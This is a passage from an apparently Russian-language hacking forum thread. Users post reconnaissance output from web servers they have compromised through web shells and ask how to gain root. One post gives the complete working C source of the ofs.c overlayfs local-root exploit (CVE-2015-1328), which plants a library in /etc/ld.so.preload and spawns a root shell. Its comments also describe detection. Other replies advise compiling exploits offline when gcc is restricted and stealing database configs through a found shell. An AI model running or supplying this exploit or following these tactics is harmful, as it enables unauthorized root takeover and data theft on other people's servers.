    lrwxrwxrwx  1 root root    21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  3 root root  4096 2014-06-24 11:04:14.153311413 +0500 crda
    drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
    drwxr-xr-x  2 root root  4096 2014-06-24 11:08:09.613305094 +0500 hdparm
    drwxr-xr-x  2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
    drwxr-xr-x  2 root root  4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
    drwxr-xr-x  2 root root  4096 2014-07-30 11:27:25.309402444 +0500 init
    -rwxr-xr-x  1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
    lrwxrwxrwx  1 root root    25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
    lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
    -rw-r--r--  1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
    lrwxrwxrwx  1 root root    17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
    -rw-r--r--  1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
    lrwxrwxrwx  1 root root    16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r--  1 root root  5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
    lrwxrwxrwx  1 root root    20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
    -rw-r--r--  1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
    drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 lsb
    drwxr-xr-x  2 root root  4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
    drwxr-xr-x 24 root root  4096 2015-06-16 08:07:17.752507007 +0500 modules
    drwxr-xr-x  2 root root  4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
    drwxr-xr-x  3 root root  4096 2014-06-24 11:03:45.029312194 +0500 plymouth
    drwxr-xr-x  3 root root  4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
    drwxr-xr-x  2 root root  4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
    drwxr-xr-x  2 root root  4096 2014-07-11 15:54:31.320044515 +0500 security
    drwxr-xr-x  3 root root  4096 2014-07-10 17:19:11.242226794 +0500 systemd
    drwxr-xr-x 15 root root  4096 2014-06-24 11:03:45.029312194 +0500 terminfo
    drwxr-xr-x  4 root root  4096 2014-07-11 15:54:50.304044005 +0500 udev
    drwxr-xr-x  2 root root  4096 2014-06-24 11:12:34.149297995 +0500 ufw
    drwxr-xr-x  4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
    drwxr-xr-x  2 root root  4096 2014-06-24 11:08:13.173304998 +0500 xtables
    ls -la --full-time /lib64 2>&1
    Code:
    total 8
    drwxr-xr-x  2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
    drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
    lrwxrwxrwx  1 root root   32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
    $ mount 2>&1
    Code:
    /dev/md0 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/cgroup type tmpfs (rw)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
    none on /sys/fs/pstore type pstore (rw)
    /dev/md1 on /opt type ext4 (rw,usrquota)
    systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
    $ df -h 2>&1
    Code:
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/md0        459G  215G  221G  50% /
    none            4.0K     0  4.0K   0% /sys/fs/cgroup
    udev            3.8G  4.0K  3.8G   1% /dev
    tmpfs           768M  1.8M  767M   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none            3.8G   16K  3.8G   1% /run/shm
    none            100M     0  100M   0% /run/user
    /dev/md1        1.8T   48G  1.7T   3% /opt
    $ cat /etc/issue 2>&1
    Code:
    Ubuntu 14.04.1 LTS \n \l
    $ cat /etc/crontab 2>&1
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    # ClamAV refresh virus databases
    30 1    * * *    root    freshclam >/dev/null 2>&1
    
    # ClamAV checking vhosts directory and sending email to admins
    0 2    * * *    root    /adm/clamav.sh >/dev/null 2>&1
    $ ls -la /etc/cron.d 2>&1
    Code:
    total 44
    drwxr-xr-x   2 root root  4096 Apr 21 08:16 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rw-------   1 root root   260 Jul 11  2014 awstats
    -rw-r--r--   1 root root  1566 Feb  3  2014 mailman
    -rw-r--r--   1 root root   589 Feb 28  2014 mdadm
    -rw-r--r--   1 root root   510 Jul  7  2014 php5
    -rw-r--r--   1 root root   110 Jul 11  2014 plesk-backup-manager-task
    -rw-r--r--   1 root root   156 Aug  7  2014 plesk-outgoing-mail-statistics-poller
    $ ls -la /etc/cron.hourly 2>&1
    Code:
    total 20
    drwxr-xr-x   2 root root  4096 Jun 24  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    $ ls -la /etc/cron.monthly 2>&1
    Code:
    total 24
    drwxr-xr-x   2 root root  4096 Jul 11  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rwxr-xr-x   1 root root   190 Jun 25  2014 50plesk-monthly
    $ ls -la /etc/cron.weekly 2>&1
    Code:
    total 40
    drwxr-xr-x   2 root root  4096 Jul 11  2014 .
    drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
    -rw-r--r--   1 root root   102 Feb  9  2013 .placeholder
    -rwxr-xr-x   1 root root   189 Jun 25  2014 50plesk-weekly
    -rwxr-xr-x   1 root root   730 Feb 23  2014 apt-xapian-index
    -rwxr-xr-x   1 root root   427 Apr 16  2014 fstrim
    -rwxr-xr-x   1 root root   771 Apr 10  2014 man-db
    -rwxr-xr-x   1 root root   211 Apr 10  2014 update-notifier-common
    $ cat /proc/version 2>&1
    Code:
    Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    Code:
    65536
    $ ls -la /usr/bin/staprun 2>&1
    Code:
    ls: cannot access /usr/bin/staprun: No such file or directory
    $ pwd 2>&1
    Code:
    /opt/www/vhosts/hostname.domain/logs
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Code:
    /*
    # Exploit Title: ofs.c - overlayfs local root in ubuntu
    # Date: 2015-06-15
    # Exploit Author: rebel
    # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
    # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
    # CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
     
    *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
    CVE-2015-1328 / ofs.c
    overlayfs incorrect permission handling + FS_USERNS_MOUNT
     
    user@ubuntu-server-1504:~$ uname -a
    Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
    user@ubuntu-server-1504:~$ id
    uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
    user@ubuntu-server-1504:~$ ./ofs
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    # id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
     
    greets to beist & kaliman
    2015-05-24
    %rebel%
    *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
    */
     
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/types.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <linux/sched.h>
     
    /*
     * LIB is the C source text of a small shared object; main() writes it to
     * /tmp/ofs-lib.c and compiles it to /tmp/ofs-lib.so. The source defines a
     * replacement getuid() that, when the calling process has euid 0 and
     * /proc/self/exe resolves to /bin/su, unlinks /etc/ld.so.preload and
     * /tmp/ofs-lib.so and then executes /bin/sh -i; in every other case it
     * returns the result of the real getuid().
     *
     * Defender note: because the library deletes /etc/ld.so.preload and itself
     * once it has run, checking for these files after the fact can come up
     * empty. Audit records for writes to /etc/ld.so.preload and for a compiler
     * being run by a service account are the more durable evidence.
     */
    #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
     
    /* 1 MiB static buffer used as the stack of the clone()d child; main() passes
     * the address just past its end to clone(). */
    static char child_stack[1024*1024];
     
    /*
     * Entry point of the child that main() starts with clone(CLONE_NEWNS).
     *
     * Recreates the scratch tree /tmp/ns_sploit, performs two overlay mounts on
     * /tmp/ns_sploit/o (filesystem type "overlayfs" first, then "overlay" with a
     * workdir as fallback), renames one lower-layer file to ld.so.preload in
     * between, and finally chmods ld.so.preload to 0777 through the second
     * mount, whose upperdir is /etc.
     *
     * stuff: unused.
     * Failure paths call exit(-1); no status is reported otherwise.
     *
     * Defender notes: this is the step that depends on the overlayfs permission
     * flaw named in the file header (CVE-2015-1328); the header lists Ubuntu
     * kernels before 2015-06-15 as affected, so the primary fix is a patched
     * kernel. Observable artifacts are the /tmp/ns_sploit tree, an overlay mount
     * whose upperdir is /etc requested from inside an unprivileged user
     * namespace, and a world-writable /etc/ld.so.preload owned by root.
     * NOTE(review): on hosts that do not need overlayfs, keeping the module from
     * loading is commonly cited as a stop-gap - confirm against the vendor
     * advisory.
     */
    static int
    child_exec(void *stuff)
    {
        char *file;
        /* Start from a clean scratch directory under /tmp. */
        system("rm -rf /tmp/ns_sploit");
        mkdir("/tmp/ns_sploit", 0777);
        mkdir("/tmp/ns_sploit/work", 0777);
        mkdir("/tmp/ns_sploit/upper",0777);
        mkdir("/tmp/ns_sploit/o",0777);
     
        fprintf(stderr,"mount #1\n");
        /* First mount: a kernel-provided directory as lowerdir, scratch dir as upperdir. */
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
    // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
                /* Both mount attempts were refused: the message below is the
                 * outcome on a kernel that does not allow this mount from a
                 * user namespace. */
                fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
                exit(-1);
            }
            file = ".access";
            chmod("/tmp/ns_sploit/work/work",0777);
        } else file = "ns_last_pid";
     
        /* Rename the chosen lower-layer file inside the overlay; the result
         * lands in the scratch upper directory as ld.so.preload. */
        chdir("/tmp/ns_sploit/o");
        rename(file,"ld.so.preload");
     
        chdir("/");
        umount("/tmp/ns_sploit/o");
        fprintf(stderr,"mount #2\n");
        /* Second mount: the scratch dir is now the lower layer and /etc the upper layer. */
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
                exit(-1);
            }
            chmod("/tmp/ns_sploit/work/work",0777);
        }
     
        /* The chmod goes through the overlay; main() then checks whether
         * /etc/ld.so.preload can be opened for writing. File-integrity
         * monitoring on /etc/ld.so.preload (creation or mode change) catches
         * this step. */
        chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
        umount("/tmp/ns_sploit/o");
    }
     
    /*
     * Program entry point. Arguments are not used.
     *
     * Forks a wrapper process that calls unshare(CLONE_NEWUSER), forks again and
     * clone()s child_exec into a new mount namespace. The original process waits
     * for the wrapper, then tries to open /etc/ld.so.preload for writing; on
     * success it writes LIB to /tmp/ofs-lib.c, compiles it with gcc into
     * /tmp/ofs-lib.so, writes that path into /etc/ld.so.preload, removes the
     * scratch files and executes /bin/su.
     *
     * Exits with -1 when the open or the compile fails.
     *
     * Defender notes: the dynamic loader loads libraries listed in
     * /etc/ld.so.preload into every dynamically linked program, setuid ones
     * included, which is why an unprivileged write to that file is a
     * root-equivalent event. Useful detections are an audit watch on
     * /etc/ld.so.preload, alerts on gcc being run by a web or service account
     * with output under /tmp, and unshare(CLONE_NEWUSER) by accounts that have
     * no reason to create user namespaces. The fix is the patched kernel
     * referenced in the file header.
     */
    int
    main(int argc, char **argv)
    {
        int status, fd, lib;
        pid_t wrapper, init;
        /* New mount namespace for the child; SIGCHLD so it can be waited on. */
        int clone_flags = CLONE_NEWNS | SIGCHLD;
     
        fprintf(stderr,"spawning threads\n");
     
        if((wrapper = fork()) == 0) {
            /* A failure here is only reported; execution continues. */
            if(unshare(CLONE_NEWUSER) != 0)
                fprintf(stderr, "failed to create new user namespace\n");
     
            if((init = fork()) == 0) {
                /* clone() takes the stack address past the end of child_stack. */
                pid_t pid =
                    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                if(pid < 0) {
                    fprintf(stderr, "failed to create new mount namespace\n");
                    exit(-1);
                }
     
                waitpid(pid, &status, 0);
     
            }
     
            waitpid(init, &status, 0);
            return 0;
        }
     
        /* Fixed 300 ms pause, then reap the wrapper process. */
        usleep(300000);
     
        wait(NULL);
     
        fprintf(stderr,"child threads done\n");
     
        /* O_WRONLY without O_CREAT: this succeeds only if the file already
         * exists and is writable by the calling user. */
        fd = open("/etc/ld.so.preload",O_WRONLY);
     
        if(fd == -1) {
            fprintf(stderr,"exploit failed\n");
            exit(-1);
        }
     
        fprintf(stderr,"/etc/ld.so.preload created\n");
        fprintf(stderr,"creating shared library\n");
        /* Writes the embedded source and compiles it on the host; a host
         * without a compiler available to this user stops at the check below. */
        lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
        write(lib,LIB,strlen(LIB));
        close(lib);
        lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
        if(lib != 0) {
            fprintf(stderr,"couldn't create dynamic library\n");
            exit(-1);
        }
        /* Registers the library path in the preload file (16 bytes, newline included). */
        write(fd,"/tmp/ofs-lib.so\n",16);
        close(fd);
        /* Removes the scratch tree and the source file; /tmp/ofs-lib.so and
         * /etc/ld.so.preload stay until the library's own getuid() hook
         * unlinks them. */
        system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
        execl("/bin/su","su",NULL);
    }
    
     
  11. powerOfthemind

    powerOfthemind New Member

    uname -a
    Code:
    Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
    686 i686 i386 GNU/Linux
    

    ls -la /boot
    Code:
    total 39154
    drwxr-xr-x  5 root root    5120 Apr  8 13:07 .
    drwxr-xr-x 28 root root    4096 Aug 10 03:00 ..
    -rw-r--r--  1 root root     163 Jan  6  2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
    -rw-r--r--  1 root root     158 Apr  2  2010 .vmlinuz-2.6.18-194.el5.hmac
    -rw-r--r--  1 root root     166 Sep 26  2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
    c
    -rw-r--r--  1 root root     165 Dec  5  2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac
    
    -rw-r--r--  1 root root     165 Jun 11  2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac
    
    -rw-r--r--  1 root root     161 Sep 17  2014 .vmlinuz-2.6.18-398.el5PAE.hmac
    -rw-r--r--  1 root root     161 Apr  7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
    -rw-r--r--  1 root root  971511 Jan  6  2011 System.map-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root  967675 Apr  2  2010 System.map-2.6.18-194.el5
    -rw-r--r--  1 root root  993118 Sep 26  2013 System.map-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root  993780 Dec  5  2013 System.map-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root  993835 Jun 11  2014 System.map-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root  993998 Sep 17  2014 System.map-2.6.18-398.el5PAE
    -rw-r--r--  1 root root  994152 Apr  7 20:53 System.map-2.6.18-404.el5PAE
    -rw-r--r--  1 root root   69598 Jan  6  2011 config-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root   69593 Apr  2  2010 config-2.6.18-194.el5
    -rw-r--r--  1 root root   70337 Sep 26  2013 config-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root   70357 Dec  5  2013 config-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root   70357 Jun 11  2014 config-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root   70353 Sep 17  2014 config-2.6.18-398.el5PAE
    -rw-r--r--  1 root root   70353 Apr  7 20:53 config-2.6.18-404.el5PAE
    drwxr-xr-x  2 root root    1024 May  4  2010 extlinux
    drwxr-xr-x  2 root root    1024 Apr  8 13:07 grub
    -rw-------  1 root root 2599913 Jan 25  2011 initrd-2.6.18-194.32.1.el5.img
    -rw-------  1 root root 2569559 Jan 25  2011 initrd-2.6.18-194.el5.img
    -rw-------  1 root root 2615526 Oct 14  2013 initrd-2.6.18-348.18.1.el5PAE.img
    -rw-------  1 root root 2615834 Jan 24  2014 initrd-2.6.18-371.3.1.el5PAE.img
    -rw-------  1 root root 2616679 Jun 12  2014 initrd-2.6.18-371.9.1.el5PAE.img
    -rw-------  1 root root 2616919 Dec  2  2014 initrd-2.6.18-398.el5PAE.img
    -rw-------  1 root root 2616967 Apr  8 13:07 initrd-2.6.18-404.el5PAE.img
    drwx------  2 root root   12288 Jan  1  2009 lost+found
    -rw-r--r--  1 root root   80032 Mar 12  2009 message
    -rw-r--r--  1 root root  111346 Jan  6  2011 symvers-2.6.18-194.32.1.el5.gz
    -rw-r--r--  1 root root  110979 Apr  2  2010 symvers-2.6.18-194.el5.gz
    -rw-r--r--  1 root root  117369 Sep 26  2013 symvers-2.6.18-348.18.1.el5PAE.gz
    -rw-r--r--  1 root root  117471 Dec  5  2013 symvers-2.6.18-371.3.1.el5PAE.gz
    -rw-r--r--  1 root root  117487 Jun 11  2014 symvers-2.6.18-371.9.1.el5PAE.gz
    -rw-r--r--  1 root root  117549 Sep 17  2014 symvers-2.6.18-398.el5PAE.gz
    -rw-r--r--  1 root root  117561 Apr  7 20:53 symvers-2.6.18-404.el5PAE.gz
    -rw-r--r--  1 root root 1877108 Jan  6  2011 vmlinuz-2.6.18-194.32.1.el5
    -rw-r--r--  1 root root 1875796 Apr  2  2010 vmlinuz-2.6.18-194.el5
    -rw-r--r--  1 root root 1908212 Sep 26  2013 vmlinuz-2.6.18-348.18.1.el5PAE
    -rw-r--r--  1 root root 1909108 Dec  5  2013 vmlinuz-2.6.18-371.3.1.el5PAE
    -rw-r--r--  1 root root 1909140 Jun 11  2014 vmlinuz-2.6.18-371.9.1.el5PAE
    -rw-r--r--  1 root root 1910164 Sep 17  2014 vmlinuz-2.6.18-398.el5PAE
    -rw-r--r--  1 root root 1910324 Apr  7 20:53 vmlinuz-2.6.18-404.el5PAE
    
    mount
    Code:
    /dev/md3 on / type ext3 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
    /dev/md2 on /boot type ext3 (rw)
    /dev/md1 on /var type ext3 (rw,noatime)
    /dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    
    df -h
    Code:
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/md3               15G  6.8G  7.1G  49% /
    /dev/md4              4.9G  2.6G  2.1G  56% /tmp
    /dev/md2              198M   46M  143M  25% /boot
    /dev/md1              436G   21G  393G   6% /var
    /dev/md0              417G  135G  260G  35% /hsphere
    tmpfs                 5.9G     0  5.9G   0% /dev/shm
    
    cat /etc/issue
    Code:
    CentOS release 5.5 (Final
    Kernel \r on an \m
    

    cat /proc/version
    Code:
    Linux version 2.6.18-371.3.1.el5PAE ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013
    
    cat /proc/sys/vm/mmap_min_addr
    4096

    Использую этот эксплоит: https://www.exploit-db.com/exploits/10613/
    Но при его компиляции пишет, что недостаточно прав на gcc. Можно это обойти? На gcc установлены права 750.

    И вопрос: я правильный эксплоит выбрал? Ещё только учусь.
     
  12. YaBtr

    1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o
    2. Нет прав на gcc, компилируйте сплойт на локальной машине.
    3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-security/2015/07/23/16
     
  13. Xsite

    Ребят, подскажите, пожалуйста: чисто случайно наткнулся на уже залитый шелл на сайте.

    Но он не даёт ни заливать файлы, ни читать.
    http://hkar.ru/D5S3
    http://hkar.ru/D5S4

    Code:
    Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    total 34093
    drwxr-xr-x  3 root root      400 Aug 11 04:52 .
    drwxr-xr-x 24 root root      640 Aug 11 04:52 ..
    -rw-------  1 root root  3391819 Jul 29 14:35 System.map-3.13.0-61-generic
    -rw-r--r--  1 root root  1165129 Jul 29 14:35 abi-3.13.0-61-generic
    -rw-r--r--  1 root root   165763 Jul 29 14:35 config-3.13.0-61-generic
    drwxr-xr-x  2 root root      472 Aug 11 04:52 grub
    -rw-r--r--  1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
    -rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
    -rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
    -rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
    -rw-------  1 root root  5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
    При команде lls -la --full-time /lib (64) тишина
    /dev/sda1 on / type reiserfs (rw,relatime,notail)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/cgroup type tmpfs (rw)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
    none on /sys/fs/pstore type pstore (rw)
    /dev/sda2 on /home type reiserfs (rw,relatime)
    systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1       9.4G  4.4G  5.0G  47% /
    none            4.0K     0  4.0K   0% /sys/fs/cgroup
    udev            3.9G   12K  3.9G   1% /dev
    tmpfs           799M  496K  798M   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none            3.9G     0  3.9G   0% /run/shm
    none            100M     0  100M   0% /run/user
    /dev/sda2       141G   51G   90G  37% /home
    Ubuntu 14.04.3 LTS \n \l
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    
    ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит
    
    Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
    65536
    /home/ah42713/web/www
    ls -la /usr/bin/staprun ничего не выводит
    find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина 
    Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности
     
  14. powerOfthemind

    По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.
     
  15. avonar

    Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active directory, о чем может идти речь?
     
  16. Valer4ik

    Есть root доступ в mysql и такой серв

    Code:
    :/var/www/user/data $ uname -a
    Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux
    :/var/www/user/data $ ls -la /boot
    total 15161
    drwxr-xr-x  4 root root     1024 May 12 13:06 .
    drwxr-xr-x 23 root root     4096 Jul 30 06:32 ..
    -rw-r--r--  1 root root  2114623 Apr 25 03:31 System.map-3.2.0-4-amd64
    -rw-r--r--  1 root root   129281 Apr 25 03:31 config-3.2.0-4-amd64
    drwxr-xr-x  3 root root     5120 May 12 13:07 grub
    -rw-r--r--  1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64
    drwxr-xr-x  2 root root    12288 May 12 13:01 lost+found
    -rw-r--r--  1 root root  2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64
    :/var/www/user/data $ ls -la --full-time /lib
    total 264
    drwxr-xr-x 13 root root  4096 2015-05-16 00:32:27.064340794 +0300 .
    drwxr-xr-x 23 root root  4096 2015-07-30 06:32:55.250270001 +0300 ..
    lrwxrwxrwx  1 root root    21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root  4096 2015-05-12 13:05:25.243433001 +0300 discover
    drwxr-xr-x  7 root root  4096 2015-05-12 13:03:48.463433001 +0300 firmware
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:13.543433001 +0300 init
